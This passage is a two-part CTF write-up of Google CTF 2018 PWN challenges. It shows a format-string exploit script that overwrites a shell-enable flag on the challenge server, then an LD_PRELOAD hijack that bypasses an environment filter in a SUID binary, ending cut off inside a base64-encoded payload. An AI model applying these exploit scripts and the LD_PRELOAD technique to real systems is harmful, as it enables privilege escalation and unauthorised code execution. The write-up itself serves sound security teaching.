7f6cde183000-7f6cde28b000 r-xp 00000000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde28b000-7f6cde48a000 ---p 00108000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48a000-7f6cde48b000 r--p 00107000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48b000-7f6cde48c000 rw-p 00108000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48c000-7f6cde5fe000 r-xp 00000000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde5fe000-7f6cde7fe000 ---p 00172000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde7fe000-7f6cde808000 r--p 00172000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde808000-7f6cde80a000 rw-p 0017c000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde80a000-7f6cde80e000 rw-p 00000000 00:00 0
7f6cde80e000-7f6cde834000 r-xp 00000000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea2b000-7f6cdea31000 rw-p 00000000 00:00 0
7f6cdea33000-7f6cdea34000 r--p 00025000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea34000-7f6cdea35000 rw-p 00026000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea35000-7f6cdea36000 rw-p 00000000 00:00 0
7fff3f482000-7fff3f4a3000 rw-p 00000000 00:00 0                          [stack]
7fff3f59b000-7fff3f59e000 r--p 00000000 00:00 0                          [vvar]
7fff3f59e000-7fff3f5a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
>

Okay so it seems that the shell functionality is disabled… what a shame! But on the other hand debug give us some memory leaks and addresses that we can use to our advantage.

I want to see if we can enable the shell command somehow. So let’s follow the shell command in IDA to see what it does and why it’s disabled.

Looking into this, it seems that the _ZL13shell_enabled command returns a 0, or false which in turn leads to the β€œSecurity made us disable the shell…” comment.

But we can also see that if this command returned True then that would trigger the _Z11debug_shellv command, which in turn should give us a debug shell on the system.

So the question is, where and how can we enable this? Is there a buffer overflow that we can exploit to call this command?

Well before we start hunting for buffer overflows and memory corruption issues, let’s first see if the binary is using any mitigation that might impact our work. For this we will use a tool called checksec.

root@kali:~/Google-CTF/Admin UI# checksec main.bin
[*] '/root/Google-CTF/Admin UI/main.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Unfortunately for us the NX is enabled, which prevents us from executing code from the stack but at the same time ASLR isn’t enabled. This means that the addresses we see in memory should relate back and be the same as on the other system.

So let’s take a look and see what address the _ZL13shell_enabled function is located at.

Looking at this, if we can somehow set the variable at address 41616138 to 1 then we can get into the shell… but how?

Well, there’s actually a way we can do that! Let’s take a look back at the echo function in IDA.

Notice that the echo function in the application calls the printf function against our input. There doesn’t seem to be any input sanitization occurring, which should allow us to carry out a format string attack.

Let’s test this theory!

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
> echo %d %d %d %d 
1094798019 4 3 -702671040 
> echo %x %x %x %x
41414ac3 4 3 d61e1740

Awesome! So the echo function is in fact vulnerable to a format string attack!

What we can do from here is build a simple Python script that’ll log into the server, pass some data into echo and then will recursively execute the %x format string which will return data as unsigned hexadecimal integers.

The reason we do this is because we want to learn where our argument is being stored in memory. In this case I pass AAAABBBB before the format string buffer. This is done because once the data is returned, if these characters were stored in memory then we should see their hexadecimal representations of 4141414142424242.

From there, once we know where our echo argument is stored, we can simply enter the memory address of the _ZL13shell_enabled function and use the %n format string to write to that memory address, thus enabling the shell.

The code that we will use can be seen below:

#!/usr/bin/env python2
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")

r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}"

print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}"
print r.recvuntil("Authenticated")
print r.recvuntil(">")

buff = ' '.join(["%i=%%%i$x" % (i, i) for i in xrange(1, 50)])
buff = "AAAABBBB" + buff

r.send("echo %s\n" % buff)
print r.recvuntil(">")

r.send("quit\n")
r.send("3")

Executing the exploit script should give us the following output.

root@kali:~/Google-CTF/Admin UI# python exp.py
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1

Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
CTF{Two_PasSworDz_Better_th4n_1_k?}
:
Authenticated

>
 AAAABBBB1=41414ac3 2=4 3=3 4=663ff740 5=2 6=0 7=0 8=0 9=0 10=0 11=0 12=0 13=0 14=0 15=0 16=74464f73 17=d5c2007d 18=0 19=0 20=0 21=0 22=0 23=0 24=6593c780 25=655eebff 26=6593b620 27=1 28=6593b6a3 29=d5c26d70 30=0 31=655f0409 32=d 33=6593b620 34=a 35=41414b86 36=d5c26d70 37=655f081b 38=6f686365 39=42424241 40=20782431 41=33207824 42=3d342078 43=253d3520 44=36253d36 45=2437253d 46=78243825 47=20782439 48=78243031 49=24313125
>
[*] Closed connection to mngmnt-iface.ctfcompetition.com port 1337

If we look closely at the format string buffer output we will see that around the 39th iteration is where our data is written to - since 39=42424241 is the same as 39=BBBA.

Knowing this we can start crafting our exploit. Notice that I insert A followed by %40$llx. The A character will be replaced with 1 later as this is the data we want to write (to make the shell function true). I used ll with the %x function because since this a 64-bit binary I need to use a long-long suffix to make sure that I’m writing to the correct area.

The letters ABCDEFGH are simply place holders that will show me where I need to enter the memory address for the shell enable command.

The update python script should look like the following:

#!/usr/bin/env python2
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")

r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}"

print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}"
print r.recvuntil("Authenticated")
print r.recvuntil(">")

buff = "A%40$llxABCDEFGH"

r.send("echo %s\n" % buff)
print r.recvuntil(">")

r.send("quit\n")
r.send("3")

Once updated, let’s go ahead and execute the script.

root@kali:~/Google-CTF/Admin UI# python test.py 
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1

Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
CTF{Two_PasSworDz_Better_th4n_1_k?}
:
Authenticated

>
 A4847464544ABCDEFGH
>
[*] Closed connection to mngmnt-iface.ctfcompetition.com port 1337

From the output, notice that 4847464544 or HGFED in hex appear. This will be the region where we will store the memory address for the _ZL13shell_enabled function.

For the final script, we will replace the first A character in the buff variable with 1, since we want to evaluate the shell enable function to True and will replace everything after the C character with the memory address.

Note that this since this is a 64-bit application, we need to pass the full memory address of 0x0000000041616138, and since x86 and x64 architectures use little endian, we will have to write the memory address backwards as seen in the script.

As a side note, I updated the exploit script to use telenetlib because I was having issues getting a shell using the pwntools library.

The final exploit script is show below:

import socket
import telnetlib

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("mngmnt-iface.ctfcompetition.com", 1337))
print s.recv(1000)

s.send("1\n")
print s.recv(1000)

s.send("CTF{I_luv_buggy_sOFtware}\n")
print s.recv(1000)

s.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print s.recv(1000)

buff  = "echo 1%40$llnABC\x38\x61\x61\x41\x00\x00\x00\x00\n"
s.send(buff)

t = telnetlib.Telnet()
t.sock = s
t.interact()

Alright, now that we have everything in place, let’s fire off this script and hope for the best!

root@kali:~/Google-CTF/Admin UI# python exp.py 
=== Management Interface ===

 1) Service access
 2) Read EULA/patch notes
 3) Quit

Please enter the backdoo^Wservice password:

! Two factor authentication required !
Please enter secret secondary password:

Authenticated
> 1ABC8aaA
> shell
id
uid=1337(user) gid=1337(user) groups=1337(user)

Awesome! We were able to write to the enable shell command memory region and can now execute shell commands!

Let’s see if we can’t find out flag.

ls -la
total 144
drwxr-xr-x 3 user   user      4096 Oct 24 19:06 .
drwxr-xr-x 3 nobody nogroup   4096 Oct 16 15:10 ..
-rw-r--r-- 1 user   user       220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user      3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user       655 May 16  2017 .profile
-rw-r--r-- 1 nobody nogroup     26 Sep 26 15:44 an0th3r_fl44444g_yo
-rw-r--r-- 1 nobody nogroup     25 Sep 26 15:44 flag
-rwxr-xr-x 1 nobody nogroup 111128 Sep 26 15:44 main
drwxr-xr-x 2 nobody nogroup   4096 Oct 24 19:06 patchnotes
cat an0th3r_fl44444g_yo
CTF{c0d3ExEc?W411_pL4y3d}

Finally, we got the flag!

FLAG: CTF{c0d3ExEc?W411_pL4y3d}

Closing

That’s it for the first part of the PWN challenges! The Admin UI challenges were somewhat complex, but weren’t overly complicated. If you understood some basic x86 Assembly and the basics on memory corruption issues then you should have been fine!

With that said, I hope you enjoyed this part of the PWN challenges! Stay tuned for Part 2, where we’ll cover the final PWN challenges!

Thanks for reading!

Google CTF (2018): Beginners Quest - PWN Solutions (2/2)

1 March 2019 at 00:00

In my previous post β€œGoogle CTF (2018): Beginners Quest - PWN Solutions (1/2)”, we covered the first set of PWN solutions for the Beginners Quest, which touched on topics such as code injection, reverse engineering, buffer overflows, and format string exploits.

In this post, we will continue our journey into the world of pwnage and exploitation. The final set of PWN solutions will cover topics such as race conditions, out-of-bound reads, write-what-where conditions, and of course more buffer overflows.

Now, before I delve too deep into these topics and solutions I need to put out a fair warning. These challenges were meant for beginners, and truthfully they’re pretty easy once you have a decent understanding of buffer overflows, exploitation, and code review, especially when you know what’s going on in the application. The only issue I encountered with this part of the solutions is that you really needed to spend a ton of time Googling and learning about Linux internals, shared libraries, memory offsets and more.

If you’re unfamiliar with what I mentioned above, then I suggest you go look at the resources I shared in my previous posts to learn about these topics. As always, I’ll try to explain the best I can and provide links to external resources, but I highly suggest some previous experience and knowledge in exploitation before delving deep into these solutions.

With that being said, let’s cut to the chase and dive right in!

Filter Env

After reading the challenge description we learn that from our previous exploit we found the credentials for the Smartfridge2000, but we aren’t able to read the file, only the root user can. We also learn that there is a weird SUID binary that looks like we can exploit, so we will do just that!

First things first, let’s connect to the env.ctfcompetition.com server on port 1337 via netcat to see what we have to work with.

root@kali:~/Google-CTF/Filter Env# nc env.ctfcompetition.com 1337
ls -al
total 76
drwxr-xr-x  21 user   user    4096 Oct 24 19:10 .
drwxr-xr-x  21 user   user    4096 Oct 24 19:10 ..
-rwxr-xr-x   1 nobody nogroup    0 Oct 24 19:04 .dockerenv
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 bin
drwxr-xr-x   2 nobody nogroup 4096 Apr 12  2016 boot
drwxr-xr-x   4 nobody nogroup 4096 Oct 24 19:04 dev
drwxr-xr-x  42 nobody nogroup 4096 Oct 24 19:04 etc
drwxr-xr-x   4 nobody nogroup 4096 Jun  6  2018 home
drwxr-xr-x   8 nobody nogroup 4096 Sep 13  2015 lib
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 lib64
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 media
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 mnt
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 opt
dr-xr-xr-x 111 nobody nogroup    0 Feb  9 21:41 proc
drwx------   2 nobody nogroup 4096 Apr 17  2018 root
drwxr-xr-x   5 nobody nogroup 4096 Apr 17  2018 run
drwxr-xr-x   2 nobody nogroup 4096 Apr 27  2018 sbin
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 srv
drwxr-xr-x   2 nobody nogroup 4096 Feb  5  2016 sys
drwxrwxrwt   2 user   user      40 Feb  9 21:41 tmp
drwxr-xr-x  10 nobody nogroup 4096 Apr 17  2018 usr

Nothing too interesting in the root folder, let’s see what’s in the home folders.

cd /home
ls -la
total 16
drwxr-xr-x  4 nobody nogroup 4096 Jun  6  2018 .
drwxr-xr-x 21 user   user    4096 Oct 24 19:10 ..
drwxr-xr-x  2 nobody nogroup 4096 Jun 14  2018 adminimum
drwxr-xr-x  3 nobody nogroup 4096 Jun 14  2018 user
cd adminimum
ls -la
total 40
drwxr-xr-x 2 nobody    nogroup    4096 Jun 14  2018 .
drwxr-xr-x 4 nobody    nogroup    4096 Jun  6  2018 ..
-rw-r--r-- 1 nobody    nogroup     220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody    nogroup    3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody    nogroup     655 May 16  2017 .profile
-rwsr-xr-x 1 adminimum adminimum 13648 Jun 14  2018 filterenv
-r-------- 1 adminimum adminimum    19 May 24  2018 flag

Okay, so we see that the adminimum user has the flag file and an interesting binary named filterenv. Let’s see what happens when we execute the binary.

./filterenv
[*] waiting for new environment
test
test
test
test
test

/bin/bash: line 6:     6 Segmentation fault      (core dumped) ./filterenv

Segmentation fault? Interesting, I wonder if we can exploit this to get a shell as the user to read the flag. At the same time I notice that the application is waiting for a new environment, so I’m guessing this also has something to do with environmental variables.

Alright, with that in mind let’s go ahead and download the attachment, and extract the files. We should then be presented with the following C code.

root@kali:~/Google-CTF/Filter Env# ls
filterenv.c
root@kali:~/Google-CTF/Filter Env# file filterenv.c 
filterenv.c: C source, ASCII text

Upon opening the source code, we are presented with the following.

#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;
static char *unsafe[] = {
  "GCONV_PATH\x00",
  "GETCONF_DIR\x00",
  "HOSTALIASES\x00",
  "LD_AOUT_LIBRARY_PATH\x00",
  "LD_AOUT_PRELOAD\x00",
  "LD_AUDIT\x00",
  "LD_DEBUG\x00",
  "LD_DEBUG_OUTPUT\x00",
  "LD_DYNAMIC_WEAK\x00",
  "LD_LIBRARY_PATH\x00",
  "LD_ORIGIN_PATH\x00",
  "LD_PRELOAD\x00",
  "LD_PROFILE\x00",
  "LD_SHOW_AUXV\x00",
  "LD_USE_LOAD_BIAS\x00",
  "LOCALDOMAIN\x00",
  "LOCPATH\x00",
  "MALLOC_TRACE\x00",
  "NIS_PATH\x00",
  "NLSPATH\x00",
  "RESOLV_HOST_CONF\x00",
  "RES_OPTIONS\x00",
  "TMPDIR\x00",
  "TZDIR\x00",
  NULL,
};

static int lol(const void *a, const void *b)
{
  if ((unsigned long)a == (unsigned long)b)
    return 0;
  else if ((unsigned long)a > (unsigned long)b)
    return 1;
  else
    return -1;
}

static void shuffle(void)
{
  unsigned int n;
  char **q;

  n = 0;
  for (q = environ; *q != NULL; q++)
    n++;

  qsort(environ, n, sizeof(char *), lol);
}

/* reset unsafe variables */
static void filter_env(void)
{
  char **p;

  for (p = unsafe; *p != NULL; p++) {
    if (getenv(*p) != NULL) {
      if (setenv(*p, "", 1) != 0)
	err(1, "setenv");
    }
  }

  /* just be safe, prevent heap spraying attacks */
  shuffle();
}

static char **readenv(void)
{
  char **env = NULL;
  char line[1024];
  size_t len, n;

  n = 0;
  while (1) {
    if (fgets(line, sizeof(line), stdin) == NULL)
      break;

    len = strlen(line);
    if (len <= 1) {
      break;
    }

    if (++n > 32)
      errx(1, "can't allocate that much variables");

    env = realloc(env, n*sizeof(char*));
    if (env == NULL)
      err(1, "realloc");

    if (len > 0 && line[len-1] == '\n')
      line[len-1] = '\x00';

    env[n-1] = strdup(line);
    if (env[n-1] == NULL)
      err(1, "strdup");
  }

  if (env == NULL)
    errx(1, "no variable set\n");

  return env;
}

static void set_new_env(void)
{
  char **env;

  printf("[*] waiting for new environment\n");
  env = readenv();

  if (clearenv() != 0)
    err(1, "clearenv");

  environ = env;
  filter_env();
}

int main(void)
{
  char *arg[] = { "/usr/bin/id", NULL };

  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  if (setreuid(geteuid(), geteuid()) != 0)
    err(1, "setreuid");

  set_new_env();

  if (execvp(arg[0], arg) != 0)
    err(1, "execvp");

  /* never reached */
  return 0;
}

Looking into the main function of the application we see that it does a few things. It set’s the real and effective user ID’s to root via setreuid and then it calls the set_new_env() function.

Let’s see what that function does.

static void set_new_env(void)
{
  char **env;

  printf("[*] waiting for new environment\n");
  env = readenv();

  if (clearenv() != 0)
    err(1, "clearenv");

  environ = env;
  filter_env();
}

From here the application prints out the β€œwaiting for…” line as we’ve seen already, sets the output of the readenv() function to a new variable called env. It then clears the environment via the clearenv() function, sets the env variable to the libc global variable environ, and finally filters the environmental variables via the filter_env function.

Okay, let’s see what the readenv function does to get a better understanding of the application as a whole.

static char **readenv(void)
{
  char **env = NULL;
  char line[1024];
  size_t len, n;

  n = 0;
  while (1) {
    if (fgets(line, sizeof(line), stdin) == NULL)
      break;

    len = strlen(line);
    if (len <= 1) {
      break;
    }

    if (++n > 32)
      errx(1, "can't allocate that much variables");

    env = realloc(env, n*sizeof(char*));
    if (env == NULL)
      err(1, "realloc");

    if (len > 0 && line[len-1] == '\n')
      line[len-1] = '\x00';

    env[n-1] = strdup(line);
    if (env[n-1] == NULL)
      err(1, "strdup");
  }

  if (env == NULL)
    errx(1, "no variable set\n");

  return env;
}

From the top, the function reads in a line via the following code: if (fgets(line, sizeof(line), stdin) == NULL), with each line being 1024 bytes as per char line[1024].

The code seems to prevent allocation of more then 32 lines of environmental variables via the following if function: if (++n > 32) .

It then allocates space on the heap for the whole env variable via env = realloc(env, n*sizeof(char*)); which is just an array of character pointers or strings. The string are added to the array via env[n-1] = strdup(line).

Pretty much this loops and resizes the data in the heap for each new string via the realloc function call.

From here is seems that these strings of environmental variables will be passed into something like execve. BUT, take note of the following in the manual page.

The argv and envp arrays must each include a null pointer at the end of the array.

But if we look into the code, we see that there is no NULL terminator being added to the end of the environmental variable array.

If we look deeper into the code for the filter_env function we will notice where the bug can be exploited.

static void filter_env(void)
{
  char **p;

  for (p = unsafe; *p != NULL; p++) {
    if (getenv(*p) != NULL) {
      if (setenv(*p, "", 1) != 0)
	err(1, "setenv");
    }
  }

  /* just be safe, prevent heap spraying attacks */
  shuffle();
}

We can see via the following line of code: for (p = unsafe; *p != NULL; p++) that this filter function keeps working till it reaches NULL. But there is no NULL terminator!

The code simply get’s the environmental variable via getenv and if it’s not NULL, then it set’s the environmental variable to an empty string via setenv if the variable exists in the environment.

The problem with this is that both the getnev and setenv functions operate only on a first variable and returns the pointer to the first matching environment variable. This will allow us to provide identical environmental variables which will cause the function to filter the first one, and then load the second one into the environment.

So to exploit this, let’s use LD_PRELOAD with a custom C function that will hijack a system call in the application, which once that system function is called, our hijacked function will run and read the flag.

We know that the application calls /usr/bin/id in the main function, so let’s try hijacking id.

We will use ltrace against the id function to trace the library calls, we can then choose a library call to hijack.

root@kali:~/Google-CTF/Filter Env# ltrace id | head
is_selinux_enabled(1, 0x7ffca5dbbbc8, 0x7ffca5dbbbd8, 0x7f7cb3e98718)                                     = 0
strrchr("id", '/')                                                                                        = nil
setlocale(LC_ALL, "")                                                                                     = "en_US.UTF-8"
bindtextdomain("coreutils", "/usr/share/locale")                                                          = "/usr/share/locale"
textdomain("coreutils")                                                                                   = "coreutils"

Right away I notice that the C function call strrchr is being used, so let’s hijack that function.

Simply let’s build a Shared Object file with the following contents that will be used for the LD_PRELOAD. The C code simply is used to read the flag for us.

#include <stdio.h>
#include <stdlib.h>

void strrchr()
{
	FILE *fptr = fopen("/home/adminimum/flag", "rb");
	char c = fgetc(fptr);
	while (c != EOF)
	{
		printf("%c", c);
		c = fgetc(fptr);
	}
	fclose(fptr);
	return 0;
}

Once done, let’s compile it.

root@kali:~/Google-CTF/Filter Env# gcc -shared exp.c -o exp.so
exp.c:4:6: warning: conflicting types for built-in function β€˜strrchr’ [-Wbuiltin-declaration-mismatch]
 void strrchr()
      ^~~~~~~
exp.c: In function β€˜strrchr’:
exp.c:14:9: warning: β€˜return’ with a value, in function returning void
  return 0;
         ^
exp.c:4:6: note: declared here
 void strrchr()
      ^~~~~~~

To transport this file over to the server, we will gzip the file and then get the base64 output of it. We can then pass the base64 code over to the server, and unzip the file.

root@kali:~/Google-CTF/Filter Env# ls -la
total 32
drwxr-xr-x  2 root root  4096 Feb 24 17:25 .
drwxr-xr-x 12 root root  4096 Feb  8 22:42 ..
-rw-r--r--  1 root root   220 Feb 24 17:24 exp.c
-rwxr-xr-x  1 root root 16136 Feb 24 17:25 exp.so
-rw-r--r--  1 root root  2425 Nov 30  1979 filterenv.c
root@kali:~/Google-CTF/Filter Env# gzip exp.so 
root@kali:~/Google-CTF/Filter Env# ls -la
total 20
drwxr-xr-x  2 root root 4096 Feb 24 17:25 .
drwxr-xr-x 12 root root 4096 Feb  8 22:42 ..
-rw-r--r--  1 root root  220 Feb 24 17:24 exp.c
-rwxr-xr-x  1 root root 2083 Feb 24 17:25 exp.so.gz
-rw-r--r--  1 root root 2425 Nov 30  1979 filterenv.c
root@kali:~/Google-CTF/Filter Env# base64 exp.so.gz | tr -d '\n'
H4sICNYnc1wAA2V4cC5zbwDtW1tsG0UUnbXzsGmapNBCaItqEEilgk0opA2Ptk4TO1uUtKUkiFe13djr2JIfYb0Gh2dExSOqiioVJCQE/PABEqgV/BSBICiovH4A8QVCRECFI5BwP4DyQZaZ3bnrnfEuFCEQEnMi++49M2dmPDMb35XnPpQYTYYkCQHCaDsi3my348cpHxlwq2BuAEXx+3q0zq7bgoKhtLIW0XaJrtXj8/ZZibVend1fjPKcfROx1qtrI65M6e2s7Qs5diDE6kJUF6O62HbWzkusjVB5C30NcO2CvRSxFuZw7ykzTa576OfhbZDuJqxrQ2cPmO59tL+gealLrIXlIJrViOwXhEZ2T6DC0UMLLyyc2qjd8VXrL4WXP709+nk7qUc+bhQ15t+7doR/Zbrz2B+NM4df5waMP+bD3xVQPxXASwHt7A+of0VA/SR+XeLDT9jtdKD+VY6vQoGqThVKRbVsaoapqkjdNT6mpnVDn8qVTd0YHxvKl4r6uDaZ150y/xI1VdXUTK6o5XP36qhsGkYqa6BMaVovosyUbqbQdMVMZTXMpfKlso7yucmUXC7JW9DI6K6dQ+pmebPcj5x1CtF38oJ1lvBfFTX2S2VtLkrKH6Y+7BPY9330c/ZwfJ02MBBnefAXdzi2jY4AUPPwrR6+7uHbPfwZDx/x8D20n3bU2MMEMQ8f9vAbPbz3/1ufh/8r95uAgICAgICAgIDAfwHKwR8iyqHWL3vx5SPzZsj6WDn4bmTBLbf6v8ZF1mXf4veuDXF8RfwsKVpatDAu+5z4JKRe+tj2PyU+CeGX5m3/Q+KT0HrpuO0/jP3MEbf/w9teJ30fbn2VmGvPmGvwcJJ0OFFrsWvDLKm3QC2uP2fX7yftKJcvK+8sh5W5uvJObYcinVQ+WTZX4wbW0AYi1mKma8NwQz+7bRcuQpXeCeXgtp/JQ68yd8rsUA5t24T52n48wloWv51svRj70v4Frv+l+3DhBNbgievGo3iz0x7TCWxq3bhImUvUlUP4Nfderb5sWY8nrO/Xdr2VsLA/j30o+8wpm33AsiqLQB7D5JEPFuw1YVZBQEBAQEBAQEBAQEBAQODvwZhEvdlSQe/V0oVcMVeoFHozeW0KSevC15PfmMmDe6RuWXFsb8WWPPlfdNqyZql+NbXSvfuQVO2W1nW0R45Izu/T6/Fr/kfL2ksqdHYnO3tu7FpxT2QW7Vh7/aarL70E9PjxHNVwPe/vdUR7J349hfu0fzMd7Ox+NDS0si10O+7hH50SAQEBAQEBAQEBAQGB/wXg/Gbdc26aoEptB1Sk5Sup+yTVXQjF9PznOurDI9taauF86Hqu/Kdlq0TsAXoIFM58VunhTDhz+TgtP4f6T1C7Atqn1j3TGXcMnC09QC08v8IZ0guorbWwfLyFHeeL1Ea5/pYtZ/wxWt+iPsxjnfpttPxX6nvPnv6bgHPsPLbQ9U1Sewu1Ge4c78jQ0HWxjcP6ZE4rxgbkzXLflVdtudy5+rO+w3hWBkJ+fMhdf5YPu+vO8i3u/mD5VneeWb7NXR+Wb3fXmeUj7n5g+WjjYDTDn4NivvwKNO3Ld7j5Fiy/0r2vWL7T9xB6GHW5eQIs343ivvwq9z5l+XPd+5Plz/PdL2F8F8H5bZZf00ggYfjz3f3D8heguC/f08Q5eSCnLZ4n/59CPvPZSfnjHH8x5escv9XuozEeuH+T9nXz/BRoO33ces3Y9Zvn+emA8Qd9rufssm50IsaX+Nd/2R5P8/551W6nef7ftvnm9X3ffm/eV1/Qdvj1+s7mm9f9N3s8zfdLWPLPs+iR/PMsrpH88yluCGhnbwCfCmjfCKj/SED95yX/vA+UMsyyWclk5BRqpHWoZkFNkfSNMlLVdEmdypcmtbyaNktGWdUqVZQqFabzuqmn5a1Xb+73r0TyPXKqZhjajKoXTWMGZQytoKvpSqEwgyUeT8U1TaaqXp3GI1LV5L7BsYSa2D1Mck9Ig6SvcknNasU0SSwZvm334NiuIcyO7J5QEwoVKMP7MDU+NgTSkdE9OwdH1T3J5M2JcXV8cOdoArOkW8g8ice9mSZ/lOfipq/YqSqszk5m4ZpiM2jspBefzs4icYZVIbk8UzC1SWxNw7FZuCqWTF2eKlbkyUoun74yl0a2l9XKWSSnZ4pY6VjTcEru1o1yrlRkHBWXGXpeIxXp1XTeRLI9a+RSnirhC1Ov4nd7bWSjlNZMDcl6li5vNm00PEfqrLOjgGvcg1bIpRBp0enEaWeyXEYy3mwFvCv8du9fBonzSKwEX89B+W4A/uuUnMT7GcdCbnwWYi3o4Wue/wmApCeu8PQPcQLYuqdfyaOHb5Y4bRv0EE+AhfgSIHG+gpxYD/QQd4CFOBPGH+IsyRNb9ughPnFtwPgBaVoGeohjwEK8ys8ffP4i1e+kPsQ7YA949Gt89FXUyPGzweVzQlwN4Ne/zOkhfgK7l6vPp40+yOkhzgLLz1eEs49xeogfwK7mFpwP1w5zevjeBRvl6vOf/yjVu+FtjLV8BMTvv2c4fVDeaFD/L3F6iBfB3s/V5+fzNeTEWLC/3DxS2b8+P/8k/ujy6CG+6jlL/UfImXvQu3m6VA/5uS2cDtaR5DNKHj3Es4u9tJ0/6f8zTu/GP/QpyJM+7av/ktNDfDbQx9bj9YBvKAd6iMviAXp+/9Qoxz+0gf6iAL3X+jyaoQNUf4ZOPHn+vwI1//+Iesbuxa39jn2DGzA//lUB+vO2OvY0x/P63wE0Q3xeCD8AAA==

Once done, let’s put this file on the server.

cd /tmp
ls -la
total 4
drwxrwxrwt  2 user user   40 Feb 24 23:28 .
drwxr-xr-x 21 user user 4096 Oct 24 19:10 ..
echo "H4sICNYnc1wAA2V4cC5zbwDtW1tsG0UUnbXzsGmapNBCaItqEEilgk0opA2Ptk4TO1uUtKUkiFe13djr2JIfYb0Gh2dExSOqiioVJCQE/PABEqgV/BSBICiovH4A8QVCRECFI5BwP4DyQZaZ3bnrnfEuFCEQEnMi++49M2dmPDMb35XnPpQYTYYkCQHCaDsi3my348cpHxlwq2BuAEXx+3q0zq7bgoKhtLIW0XaJrtXj8/ZZibVend1fjPKcfROx1qtrI65M6e2s7Qs5diDE6kJUF6O62HbWzkusjVB5C30NcO2CvRSxFuZw7ykzTa576OfhbZDuJqxrQ2cPmO59tL+gealLrIXlIJrViOwXhEZ2T6DC0UMLLyyc2qjd8VXrL4WXP709+nk7qUc+bhQ15t+7doR/Zbrz2B+NM4df5waMP+bD3xVQPxXASwHt7A+of0VA/SR+XeLDT9jtdKD+VY6vQoGqThVKRbVsaoapqkjdNT6mpnVDn8qVTd0YHxvKl4r6uDaZ150y/xI1VdXUTK6o5XP36qhsGkYqa6BMaVovosyUbqbQdMVMZTXMpfKlso7yucmUXC7JW9DI6K6dQ+pmebPcj5x1CtF38oJ1lvBfFTX2S2VtLkrKH6Y+7BPY9330c/ZwfJ02MBBnefAXdzi2jY4AUPPwrR6+7uHbPfwZDx/x8D20n3bU2MMEMQ8f9vAbPbz3/1ufh/8r95uAgICAgICAgIDAfwHKwR8iyqHWL3vx5SPzZsj6WDn4bmTBLbf6v8ZF1mXf4veuDXF8RfwsKVpatDAu+5z4JKRe+tj2PyU+CeGX5m3/Q+KT0HrpuO0/jP3MEbf/w9teJ30fbn2VmGvPmGvwcJJ0OFFrsWvDLKm3QC2uP2fX7yftKJcvK+8sh5W5uvJObYcinVQ+WTZX4wbW0AYi1mKma8NwQz+7bRcuQpXeCeXgtp/JQ68yd8rsUA5t24T52n48wloWv51svRj70v4Frv+l+3DhBNbgievGo3iz0x7TCWxq3bhImUvUlUP4Nfderb5sWY8nrO/Xdr2VsLA/j30o+8wpm33AsiqLQB7D5JEPFuw1YVZBQEBAQEBAQEBAQEBAQODvwZhEvdlSQe/V0oVcMVeoFHozeW0KSevC15PfmMmDe6RuWXFsb8WWPPlfdNqyZql+NbXSvfuQVO2W1nW0R45Izu/T6/Fr/kfL2ksqdHYnO3tu7FpxT2QW7Vh7/aarL70E9PjxHNVwPe/vdUR7J349hfu0fzMd7Ox+NDS0si10O+7hH